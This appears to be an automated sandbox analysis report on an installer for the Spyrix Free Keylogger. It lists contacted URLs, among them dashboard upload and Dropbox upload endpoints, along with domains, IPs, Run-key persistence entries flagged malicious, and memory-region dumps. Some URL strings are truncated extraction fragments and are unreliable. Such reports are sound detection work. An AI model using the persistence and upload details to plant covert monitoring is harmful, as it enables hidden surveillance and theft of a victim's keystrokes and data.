https://spyrix.net/dashboard/prg-actionsll
unknown
http://www.innosetup.com/
unknown
https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/4047
unknown
https://spyrix.net/dashboard/proxy/upload
unknown
https://cdnbaynet.com/loader/link.php?prg_id=sfk%
unknown
https://api.dropbox.com/1/shares/dropbox
unknown
HTTPS://DASHBOARD.SPYRIX.COM/
unknown
https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404E
unknown
https://api-content.dropbox.com/1/files/dropbox
unknown
http://crl.ver)
unknown
https://cdn.cdndownload.net/dashboard30/assets/Modal-04ffda94.css
95.181.182.182
https://api-content.dropbox.com/1/files_put
unknown
http://www.carterandcone.coml
unknown
https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404
23.109.93.100
https://api.dropbox.com/1/oauth/request_token?
unknown
HTTPS://SPYRIX.NET/DASHBOARD/PRG-ACTIONS
unknown
https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404l=
unknown
https://cdn.cdndownload.net/dashboard30/assets/Copyright.vue_vue_type_script_setup_true_lang-05301fe7.js
95.181.182.182
https://spyrix.net/das
unknown
https://api.dropbox.com/1/metadata/sandbox
unknown
https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/
unknown
https://spyrix.net/usr/monitor/access.txt
unknown
http://www.actualkeylogger.com/help.html#registrate
unknown
http://www.ok.ru/dk?st.cmd=searchResult
unknown
http://repository.certum.pl/l3.cer0
unknown
https://api.dropbox.com/1/fileops/create_folder
unknown
https://cdn.cdndownload.net/dashboard30/assets/Nunito-Regular-73dcaa51.woff2
95.181.182.182
https://cdn.cdndownload.net/dashboard30/assets/ButtonText.vue_vue_type_script_setup_true_lang-1bda6e81.js
95.181.182.182
http://html4/loose.dtd
unknown
http://www.founder.com.cn/cn/bThe
unknown
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
unknown
https://spyrix.net/dashboard/prg-actionsv
unknown
https://spyrix.net/dashboard/prg-actionsuu/
unknown
https://swtb-download.spyrix-sfk.com/download/sfkf
unknown
http://neftali.clubdelphi.com/
unknown
http://.css
unknown
https://filedn.com
unknown
https://cdn.cdndownload.net/dashboard30/assets/ButtonTemplate.module-c837805f.js
95.181.182.182
https://api.dropbox.com/1/fileops/copy?
unknown
https://spyrix.net/dashboard/prg-actionsuu7
unknown
https://swtb-download.spyrix-sfk.com/download/sfko
unknown
https://cdn.cdndownload.net/dashboard30/assets/Button-ca236c00.css
95.181.182.182
http://www.typography.netD
unknown
https://swtb-download.spyrix-sfk.com/download/sfkff
unknown
https://dashboard.actualkeylogger.com
unknown
http://vk.com/search
unknown
https://cdn.cdndownload.net/dashboard30/assets/en-5393c481.js
95.181.182.182
http://vk.com/searchecp
unknown
http://www.actualkeylogger.com/buynow.html
unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeLOCALAPPDL
unknown
http://www.fonts.com
unknown
http://www.sandoll.co.kr
unknown
https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404k
unknown
http://.jpg
unknown
https://api.dropbox.com/1/fileops/move
unknown
https://cdn.cdndownload.net/dashboard30/assets/Input.vue_vue_type_script_setup_true_lang-31858815.js
95.181.182.182
https://swtb-download.spy
unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe7
unknown
http://www.actualkeylogger.com/help.htmlhttp://spyrix.com/manual.phpU
unknown
https://spyrix.net/dashboard/prg-actionsers
unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe.
unknown
https://cdnbaynet.com/loader/link.php?prg_id=sfkX0
unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe4
unknown
https://securcdn.com/loader/link.php?prg_id=sfkupowershell.exe
unknown
https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exeF
unknown
https://cdn.cdndownload.net/dashboard30/assets/Button.module-6d4e91b8.js
95.181.182.182
https://cdn.cdndownload.net/dashboard30/assets/ButtonText-ead06ca1.css
95.181.182.182
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
swtb-download.spyrix-sfk.com
167.114.14.168
spyrix.net
158.69.117.119
dashboard.spyrix.com
158.69.117.119
www.google.com
142.250.185.228
filedn.com
23.109.93.100
cl-e0469d03.edgecdn.ru
95.181.182.182
cdnbaynet.com
167.114.14.170
cdn.cdndownload.net
unknown

IPs

IP
Domain
Country
Malicious
142.250.185.228
www.google.com
United States
192.168.2.4
unknown
unknown
167.114.14.168
swtb-download.spyrix-sfk.com
Canada
239.255.255.250
unknown
Reserved
158.69.117.119
spyrix.net
Canada
167.114.14.170
cdnbaynet.com
Canada
95.181.182.182
cl-e0469d03.edgecdn.ru
Russian Federation
127.0.0.1
unknown
unknown
23.109.93.100
filedn.com
Netherlands

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
localSPM
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
localmon
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\[space]= _RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Owner
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
SessionHash
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
Sequence
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\EnumKreg\value
tid
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFiles0000
HKEY_CURRENT_USER\SOFTWARE\Microsoft\RestartManager\Session0000
RegFilesHash
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
kbdsprt
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
localSPM
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
Inno Setup: Setup Version
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
Inno Setup: App Path
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
InstallLocation
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
Inno Setup: Icon Group
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
Inno Setup: User
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
Inno Setup: Language
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
UninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
QuietUninstallString
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
DisplayVersion
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
NoModify
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
NoRepair
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
InstallDate
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
MajorVersion
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
MinorVersion
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
VersionMajor
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
VersionMinor
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Spyrix Free Keylogger_is1
EstimatedSize
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.FriendlyAppName
HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\System32\WScript.exe.ApplicationCompany
HKEY_CURRENT_USER\SOFTWARE\Microsoft\ActiveMovie\devenum
Version
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{FBF23B40-E3F0-101B-8488-00AA003E56F8} {000214E4-0000-0000-C000-000000000046} 0xFFFF
There are 39 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
7CF000
heap
page read and write
A16000
heap
page read and write
2C9E000
heap
page read and write
FF394FE000
unkown
page readonly
1550000
heap
page read and write
54EE000
stack
page read and write
4410000
direct allocation
page execute and read and write
77F1000
heap
page read and write
2FE4000
heap
page read and write
33BB000
heap
page read and write
778A000
heap
page read and write
8B67000
direct allocation
page read and write
2BE1770A000
heap
page read and write
3BF0000
direct allocation
page execute and read and write
1066000
unkown
page read and write
74A000
heap
page read and write
2FE4000
heap
page read and write
8FF000
heap
page read and write
33C0000
heap
page read and write
508E000
stack
page read and write
2FCC000
heap
page read and write
788E000
stack
page read and write
1B21000
heap
page read and write
8AE7000
direct allocation
page read and write
79CE000
stack
page read and write
2BF0000
trusted library allocation
page read and write
4D9F000
direct allocation
page read and write
1295C1C2000
heap
page read and write
23B3000
heap
page read and write
40F0000
direct allocation
page execute and read and write
3A50000
direct allocation
page execute and read and write
7810000
trusted library allocation
page read and write
2FE4000
heap
page read and write
11B0000
heap
page read and write
15D8000
heap
page read and write
9FE000
stack
page read and write
33A4000
heap
page read and write
EEE000
stack
page read and write
318F000
heap
page read and write
34AE000
heap
page read and write
2BE17430000
trusted library allocation
page read and write
2CB5000
heap
page read and write
51E0000
heap
page execute and read and write
155C000
heap
page read and write
8B1F000
direct allocation
page read and write
42A0000
direct allocation
page execute and read and write
33A4000
heap
page read and write
7B14000
heap
page read and write
33A4000
heap
page read and write
8460000
trusted library allocation
page read and write
44A0000
direct allocation
page read and write
556E000
stack
page read and write
29CE000
stack
page read and write
915000
unkown
page execute and read and write
348F000
heap
page read and write
2CB1000
heap
page read and write
33C0000
heap
page read and write
7A5000
heap
page read and write
34C3000
heap
page read and write
31AE000
heap
page read and write
7B7000
heap
page read and write
1AF3000
heap
page read and write
2BE12A91000
trusted library allocation
page read and write
CF7000
stack
page read and write
43E000
unkown
page readonly
4140000
direct allocation
page execute and read and write
7FE17000
direct allocation
page read and write
502E000
stack
page read and write
925000
unkown
page execute and read and write
7FDF0000
direct allocation
page read and write
1066000
unkown
page write copy
2FD4000
heap
page read and write
59E000
stack
page read and write
9990000
heap
page read and write
29B0000
trusted library allocation
page read and write
8460000
trusted library allocation
page read and write
3340000
heap
page read and write
2BE11E70000
heap
page read and write
2FE4000
heap
page read and write
3485000
heap
page read and write
1295C1BC000
heap
page read and write
1160000
trusted library allocation
page read and write
4CF2000
direct allocation
page read and write
7ACC000
heap
page read and write
1459000
heap
page read and write
2D70000
heap
page read and write
11E0000
heap
page read and write
D11000
unkown
page execute read
6C54000
direct allocation
page read and write
32D6000
heap
page read and write
1AEF000
heap
page read and write
FF384FE000
stack
page read and write
84E0000
trusted library allocation
page read and write
1295C110000
heap
page read and write
2BE175D0000
remote allocation
page read and write
2FD4000
heap
page read and write
7721000
heap
page read and write
94F000
stack
page read and write
2ACB000
heap
page read and write
33A4000
heap
page read and write
2FE4000
heap
page read and write
A84000
unkown
page execute and read and write
17E0000
heap
page read and write
9DA000
unkown
page execute and read and write
8460000
trusted library allocation
page read and write
32F0000
heap
page read and write
87D7000
direct allocation
page read and write
A2F0000
trusted library allocation
page execute and read and write
12DA000
heap
page read and write
7789000
heap
page read and write
3493000
heap
page read and write
7717000
heap
page read and write
2FE4000
heap
page read and write
2FE4000
heap
page read and write
34D8000
heap
page read and write
4050000
direct allocation
page execute and read and write
1295C3E0000
heap
page read and write
2773000
direct allocation
page read and write
3299000
heap
page read and write
3462000
heap
page read and write
61E01000
unkown
page execute read
2BC1000
trusted library allocation
page read and write
2FE4000
heap
page read and write
2FD4000
heap
page read and write
4FF0000
trusted library allocation
page read and write
61E9F000
unkown
page readonly
6520000
direct allocation
page read and write
3BE0000
direct allocation
page execute and read and write
342D000
stack
page read and write
7FC10000
direct allocation
page read and write
5660000
heap
page read and write
4FF0000
trusted library allocation
page read and write
33A4000
heap
page read and write
2FA0000
heap
page read and write
455D000
direct allocation
page read and write
3FE0000
direct allocation
page execute and read and write
270F000
direct allocation
page read and write
C0D000
stack
page read and write
2CBB000
heap
page read and write
9C8000
unkown
page execute and read and write
32D0000
heap
page read and write
3730000
direct allocation
page execute and read and write
2FE4000
heap
page read and write
3436000
direct allocation
page read and write
2FD4000
heap
page read and write
1B15000
heap
page read and write
2FD4000
heap
page read and write
36F8000
direct allocation
page read and write
2BE176F8000
heap
page read and write
33A4000
heap
page read and write
355A000
heap
page read and write
3240000
direct allocation
page read and write
3B10000
direct allocation
page execute and read and write
4D0000
heap
page read and write
349F000
heap
page read and write
2F80000
heap
page read and write
2BE18000000
heap
page read and write
2FD5000
heap
page read and write
8460000
trusted library allocation
page read and write
1295C1F6000
heap
page read and write
1455000
heap
page read and write
4591000
direct allocation
page read and write
97E000
stack
page read and write
34B2000
heap
page read and write
1AE0000
heap
page read and write
2AFC000
stack
page read and write
7784000
heap
page read and write
5A9000
unkown
page read and write
3900000
direct allocation
page execute and read and write
3485000
heap
page read and write
33A4000
heap
page read and write
1295C1EF000
heap
page read and write
36C0000
remote allocation
page read and write
3E60000
direct allocation
page execute and read and write
33A4000
heap
page read and write
2BEE000
stack
page read and write
33A4000
heap
page read and write
34A5000
heap
page read and write
319D000
heap
page read and write
4490000
direct allocation
page execute and read and write
5DF000
stack
page read and write
2320000
heap
page read and write
2C83000
heap
page read and write
7FE10000
direct allocation
page read and write
2BE17580000
trusted library allocation
page read and write
2282000
direct allocation
page read and write
550000
heap
page read and write
507E000
stack
page read and write
4330000
direct allocation
page execute and read and write
33A4000
heap
page read and write
77F1000
heap
page read and write
C5E000
stack
page read and write
8460000
trusted library allocation
page read and write
1C65000
heap
page read and write
865000
unkown
page execute and write copy
8460000
trusted library allocation
page read and write
8B9C000
direct allocation
page read and write
3643000
heap
page read and write
7DBC000
heap
page read and write
32C0000
heap
page read and write
2BE120BA000
heap
page read and write
7E5000
heap
page read and write
2FD4000
heap
page read and write
3472000
heap
page read and write
2F0E000
stack
page read and write
5008000
trusted library allocation
page read and write
2FE4000
heap
page read and write
340E000
stack
page read and write
4360000
direct allocation
page execute and read and write
12BE99D0000
heap
page read and write
863D000
direct allocation
page read and write
56D000
stack
page read and write
2DD0000
heap
page read and write
77F6000
heap
page read and write
1295C120000
heap
page read and write
7FD50000
direct allocation
page read and write
12DB000
heap
page read and write
42D0000
direct allocation
page execute and read and write
8460000
trusted library allocation
page read and write
85EA000
direct allocation
page read and write
327E000
stack
page read and write
7735000
heap
page read and write
2DD0000
trusted library allocation
page read and write
2FE4000
heap
page read and write
BCE000
stack
page read and write
FF388FB000
stack
page read and write
79A000
heap
page read and write
3D50000
direct allocation
page execute and read and write
12BE9AE0000
heap
page read and write
2BE12913000
heap
page read and write
6A9E000
stack
page read and write
8460000
trusted library allocation
page read and write
463C000
direct allocation
page read and write
3650000
heap
page read and write
2BE17438000
trusted library allocation
page read and write
12D1000
heap
page read and write
2FD4000
heap
page read and write
3200000
heap
page read and write
346A000
direct allocation
page read and write
33A4000
heap
page read and write
12BE97F7000
heap
page read and write
78C000
heap
page read and write
2FD3000
heap
page read and write
3EF0000
direct allocation
page execute and read and write
8460000
trusted library allocation
page read and write
8CDB000
direct allocation
page read and write
30DE000
stack
page read and write
2CBA000
heap
page read and write
8150000
trusted library allocation
page read and write
1067000
unkown
page write copy
3EE0000
direct allocation
page execute and read and write
12CA000
heap
page read and write
2BE12900000
heap
page read and write
7F3000
heap
page read and write
F9E000
unkown
page write copy
49E000
stack
page read and write
8460000
trusted library allocation
page read and write
2BE11E50000
heap
page read and write
51A0000
heap
page read and write
33A4000
heap
page read and write
23AF000
direct allocation
page read and write
26EF000
direct allocation
page read and write
13E6000
heap
page read and write
8850000
trusted library allocation
page read and write
33A4000
heap
page read and write
3498000
heap
page read and write
50BF000
stack
page read and write
8460000
trusted library allocation
page read and write
2289000
direct allocation
page read and write
2C83000
heap
page read and write
1295C21F000
heap
page read and write
77F1000
heap
page read and write
2FD4000
heap
page read and write
2BE173B0000
trusted library allocation
page read and write
790F000
stack
page read and write
7735000
heap
page read and write
3B70000
direct allocation
page execute and read and write
5E0000
heap
page read and write
3472000
heap
page read and write
2FE4000
heap
page read and write
2AB0000
heap
page read and write
12BE97F0000
heap
page read and write
2DE5000
trusted library allocation
page read and write
C70000
heap
page read and write
23F9000
direct allocation
page read and write
7FE43000
direct allocation
page read and write
3461000
heap
page read and write
348E000
heap
page read and write
2DC7000
trusted library allocation
page read and write
D50000
heap
page read and write
3481000
direct allocation
page read and write
323D000
stack
page read and write
12CA000
heap
page read and write
2F9F000
stack
page read and write
3660000
direct allocation
page execute and read and write
2C84000
heap
page read and write
2B40000
heap
page read and write
16B6000
heap
page read and write
2B0D000
stack
page read and write
2FE4000
heap
page read and write
7D10000
heap
page read and write
928E000
stack
page read and write
3320000
heap
page read and write
36F0000
direct allocation
page execute and read and write
33A4000
heap
page read and write
8663000
direct allocation
page read and write
2F4D000
stack
page read and write
2BF0000
heap
page read and write
F20000
trusted library allocation
page read and write
36EA000
direct allocation
page read and write
4FF6000
trusted library allocation
page read and write
34A8000
heap
page read and write
2ED0000
heap
page read and write
3331000
direct allocation
page read and write
248A000
direct allocation
page read and write
32DC000
heap
page read and write
820000
heap
page read and write
66EA000
heap
page read and write
33BE000
stack
page read and write
8460000
trusted library allocation
page read and write
145A000
heap
page read and write
12DB000
heap
page read and write
35AE000
stack
page read and write
21C0000
direct allocation
page read and write
3C90000
direct allocation
page execute and read and write
33A4000
heap
page read and write
12D1000
heap
page read and write
82AC000
stack
page read and write
61E00000
unkown
page readonly
7735000
heap
page read and write
3430000
heap
page read and write
5C2B000
stack
page read and write
8CD8000
direct allocation
page read and write
7B66000
heap
page read and write
1B21000
heap
page read and write
7B2000
heap
page read and write
2F80000
trusted library allocation
page read and write
2DBE000
stack
page read and write
4B8E000
stack
page read and write
52D0000
trusted library allocation
page read and write
1F3AE730000
heap
page read and write
3070000
heap
page read and write
33A4000
heap
page read and write
7721000
heap
page read and write
2BE176C9000
heap
page read and write
3960000
direct allocation
page execute and read and write
61E88000
unkown
page write copy
2FD4000
heap
page read and write
2DBF000
trusted library allocation
page read and write
31AF000
heap
page read and write
1B0E000
heap
page read and write
7721000
heap
page read and write
2D21000
trusted library allocation
page read and write
2FE4000
heap
page read and write
34AC000
direct allocation
page read and write
36F1000
direct allocation
page read and write
1B2B000
heap
page read and write
2FD4000
heap
page read and write
3F60000
direct allocation
page execute and read and write
458B000
direct allocation
page read and write
3AD0000
direct allocation
page execute and read and write
1F3AE735000
heap
page read and write
7FDDE000
direct allocation
page read and write
7FE11000
direct allocation
page read and write
348D000
heap
page read and write
7735000
heap
page read and write
3600000
heap
page read and write
242C000
direct allocation
page read and write
AFF000
stack
page read and write
33A4000
heap
page read and write
3203000
heap
page read and write
38C0000
direct allocation
page execute and read and write
86C4000
direct allocation
page read and write
CDE000
stack
page read and write
2E00000
trusted library allocation
page read and write
2BE12D40000
trusted library allocation
page read and write
12D1000
heap
page read and write
2FE4000
heap
page read and write
337F000
stack
page read and write
67DF000
stack
page read and write
3C15000
heap
page read and write
2FE4000
heap
page read and write
7717000
heap
page read and write
33A4000
heap
page read and write
22C6000
direct allocation
page read and write
2EC0000
remote allocation
page read and write
79D000
heap
page read and write
41B0000
direct allocation
page execute and read and write
33A4000
heap
page read and write
32C9000
heap
page read and write
570000
heap
page read and write
47D000
stack
page read and write
5630000
heap
page read and write
7FE4D000
direct allocation
page read and write
339F000
stack
page read and write
7E0000
direct allocation
page execute and read and write
2FE4000
heap
page read and write
33B8000
heap
page read and write
1295C1B9000
heap
page read and write
506F000
stack
page read and write
783000
heap
page read and write
41E0000
direct allocation
page execute and read and write
1840000
heap
page read and write
8CC000
stack
page read and write
16F0000
direct allocation
page read and write
2EE5000
heap
page read and write
12CA000
heap
page read and write
106A000
unkown
page write copy
4180000
direct allocation
page execute and read and write
33A4000
heap
page read and write
86A7000
direct allocation
page read and write
794E000
stack
page read and write
74F000
heap
page read and write
2FE4000
heap
page read and write
348A000
heap
page read and write
3AC0000
direct allocation
page execute and read and write
4F9F000
stack
page read and write
1B18000
heap
page read and write
1B11000
heap
page read and write
F10000
trusted library allocation
page read and write
7FD90000
direct allocation
page read and write
55CF000
stack
page read and write
1AEC000
heap
page read and write
3193000
heap
page read and write
2FD4000
heap
page read and write
777000
heap
page read and write
3FD0000
direct allocation
page execute and read and write
3BA0000
direct allocation
page execute and read and write
5DE000
stack
page read and write
77F1000
heap
page read and write
12A3000
heap
page read and write
29FE000
stack
page read and write
2F50000
heap
page read and write
2FD4000
heap
page read and write
7C8000
heap
page read and write
2CB1000
heap
page read and write
22A9000
direct allocation
page read and write
2BE176EC000
heap
page read and write
33A4000
heap
page read and write
DFD000
stack
page read and write
23CA000
direct allocation
page read and write
55AF000
stack
page read and write
764D000
stack
page read and write
2BE1764D000
heap
page read and write
33AE000
stack
page read and write
2FF6000
heap
page read and write
8460000
trusted library allocation
page read and write
7AA000
heap
page read and write
3B50000
direct allocation
page execute and read and write
2FD4000
heap
page read and write
8460000
trusted library allocation
page read and write
7BD000
heap
page read and write
3430000
direct allocation
page execute and read and write
32C9000
heap
page read and write
1B2B000
heap
page read and write
3640000
heap
page read and write
6C1D000
stack
page read and write
2FD4000
heap
page read and write
A50000
heap
page read and write
2CB5000
heap
page read and write
38A0000
direct allocation
page execute and read and write
32D5000
direct allocation
page read and write
2FE4000
heap
page read and write
735000
heap
page read and write
1A8217F000
stack
page read and write
788000
heap
page read and write
7FE00000
direct allocation
page read and write
501F000
stack
page read and write
5DC000
stack
page read and write
39B0000
direct allocation
page execute and read and write
2BE174F2000
trusted library allocation
page read and write
225D000
direct allocation
page read and write
2FCC000
heap
page read and write
8460000
trusted library allocation
page read and write
1299000
heap
page read and write
2B90000
trusted library allocation
page read and write
3310000
heap
page read and write
189D000
heap
page read and write
34AA000
heap
page read and write
D10000
heap
page read and write
106A000
unkown
page write copy
3640000
heap
page read and write
2FE4000
heap
page read and write
8460000
trusted library allocation
page read and write
8150000
trusted library allocation
page read and write
2ACF000
heap
page read and write
2FE4000
heap
page read and write
7C4000
heap
page read and write
8150000
trusted library allocation
page read and write
85F5000
direct allocation
page read and write
7735000
heap
page read and write
2741000
direct allocation
page read and write
FF38EFE000
unkown
page readonly
2BE12013000
heap
page read and write
4FFE000
stack
page read and write
3558000
heap
page read and write
7D7F000
heap
page read and write
7789000
heap
page read and write
355B000
heap
page read and write
FF38DFE000
unkown
page readonly
22E3000
direct allocation
page read and write
3656000
heap
page read and write
2FD4000
heap
page read and write
33A4000
heap
page read and write
1061000
unkown
page read and write
3580000
direct allocation
page execute and read and write
456C000
direct allocation
page read and write
4210000
direct allocation
page execute and read and write
7B6000
heap
page read and write
5008000
trusted library allocation
page read and write
5300000
heap
page read and write
3680000
direct allocation
page execute and read and write
4DD9000
direct allocation
page read and write
50F0000
heap
page read and write
3642000
heap
page read and write
66E000
stack
page read and write
1B1A000
heap
page read and write
2BE17521000
trusted library allocation
page read and write
1B2A000
heap
page read and write
A10000
heap
page read and write
FF389FE000
unkown
page readonly
1066000
unkown
page read and write
500A000
trusted library allocation
page read and write
2FD4000
heap
page read and write
7789000
heap
page read and write
241D000
direct allocation
page read and write
2AD0000
heap
page read and write
4420000
direct allocation
page execute and read and write
F9E000
unkown
page read and write
3038000
heap
page read and write
3EA0000
direct allocation
page execute and read and write
1295C1F0000
heap
page read and write
4DA4000
direct allocation
page read and write
34AA000
heap
page read and write
8460000
trusted library allocation
page read and write
9E3867F000
stack
page read and write
1A7E000
stack
page read and write
A1B000
heap
page read and write
2300000
heap
page read and write
7FE40000
direct allocation
page read and write
54BC000
stack
page read and write
43B0000
direct allocation
page execute and read and write
1790000
heap
page read and write
2FF1000
heap
page read and write
5310000
heap
page read and write
3463000
direct allocation
page read and write
1295C1C2000
heap
page read and write
652A000
direct allocation
page read and write
8460000
trusted library allocation
page read and write
8B3F000
direct allocation
page read and write
19980FE000
stack
page read and write
316E000
stack
page read and write
2BE1206D000
heap
page read and write
150000
stack
page read and write
323E000
stack
page read and write
3299000
heap
page read and write
2BE17474000
trusted library allocation
page read and write
7F7000
heap
page read and write
2BE176C0000
heap
page read and write
2FE4000
heap
page read and write
7FD88000
direct allocation
page read and write
7810000
trusted library allocation
page read and write
924F000
stack
page read and write
77D000
stack
page read and write
4250000
direct allocation
page execute and read and write
33A4000
heap
page read and write
7A3000
heap
page read and write
2DFE000
trusted library allocation
page read and write
7611000
heap
page read and write
66B0000
heap
page read and write
1925000
heap
page read and write
190000
heap
page read and write
2FE4000
heap
page read and write
2265000
direct allocation
page read and write
2FE4000
heap
page read and write
44E1000
direct allocation
page read and write
2DC2000
trusted library allocation
page read and write
7722000
heap
page read and write
2FE4000
heap
page read and write
2442000
direct allocation
page read and write
450000
heap
page read and write
18C8000
heap
page read and write
12D1000
heap
page read and write
5536000
heap
page read and write
2F4F000
stack
page read and write
7DB000
heap
page read and write
30D0000
heap
page read and write
31FF000
heap
page read and write
512E000
stack
page read and write
FF382FE000
unkown
page readonly
3350000
direct allocation
page execute and read and write
2FE4000
heap
page read and write
43E0000
direct allocation
page execute and read and write
8460000
trusted library allocation
page read and write
F72000
heap
page read and write
1B25000
heap
page read and write
7FD42000
direct allocation
page read and write
AE0000
heap
page read and write
7734000
heap
page read and write
42E0000
direct allocation
page execute and read and write
7810000
trusted library allocation
page read and write
890000
unkown
page execute and read and write
7D8D000
heap
page read and write
33BB000
heap
page read and write
77F1000
heap
page read and write
2765000
direct allocation
page read and write
86FB000
direct allocation
page read and write
2FE4000
heap
page read and write
452B000
direct allocation
page read and write
2BE17659000
heap
page read and write
1061000
unkown
page read and write
2BEE000
stack
page read and write
12BE000
heap
page read and write
365A000
heap
page read and write
2FD4000
heap
page read and write
333E000
stack
page read and write
2BE176FA000
heap
page read and write
1B20000
heap
page read and write
36A0000
direct allocation
page execute and read and write
31AA000
heap
page read and write
3D30000
direct allocation
page execute and read and write
FF38D7E000
stack
